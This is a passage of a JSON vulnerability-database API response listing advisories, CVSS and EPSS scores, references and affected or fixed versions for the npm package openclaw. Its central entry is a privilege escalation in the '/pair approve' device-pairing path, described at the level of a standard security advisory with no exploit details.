                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"
                }
            ],
            "aliases": [
                "GHSA-j56c-wpqm-h24x"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jtxm-z4vv-cqg7"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91709?format=api",
            "vulnerability_id": "VCID-k3up-1vdf-2uh9",
            "summary": "Duplicate Advisory: OpenClaw: /pair approve command path omitted caller scope subsetting and reopened device pairing escalation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hc5h-pmr3-3497. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains a privilege escalation vulnerability in the /pair approve command path, which fails to forward caller scopes into the core approval check. A caller with pairing privileges but without admin privileges can approve pending device requests that ask for broader scopes, including admin access, because scope validation is missing in extensions/device-pair/index.ts and src/infra/device-pairing.ts.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33579",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33579"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f275-5h5c-5wg5",
                    "reference_id": "GHSA-f275-5h5c-5wg5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-f275-5h5c-5wg5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-f275-5h5c-5wg5"
            ],
            "risk_score": 4.4,
            "exploitability": "0.5",
            "weighted_severity": "8.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k3up-1vdf-2uh9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91677?format=api",
            "vulnerability_id": "VCID-k52b-966p-ybbk",
            "summary": "OpenClaw: /pair approve command path omitted caller scope subsetting and reopened device pairing escalation\n## Summary\n\nThe `/pair approve` command path called device approval without forwarding caller scopes into the core approval check.\n\n## Impact\n\nA caller that held pairing privileges but not admin privileges could approve a pending device request asking for broader scopes, including admin access.\n\n## Affected Component\n\n`extensions/device-pair/index.ts, src/infra/device-pairing.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `4ee4960de2` (`Pairing: forward caller scopes during approval`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33579",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05112",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05097",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06183",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33579"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/4ee4960de2330b5322127f925f3687dc6f105be1",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/4ee4960de2330b5322127f925f3687dc6f105be1"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:39Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33579",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33579"
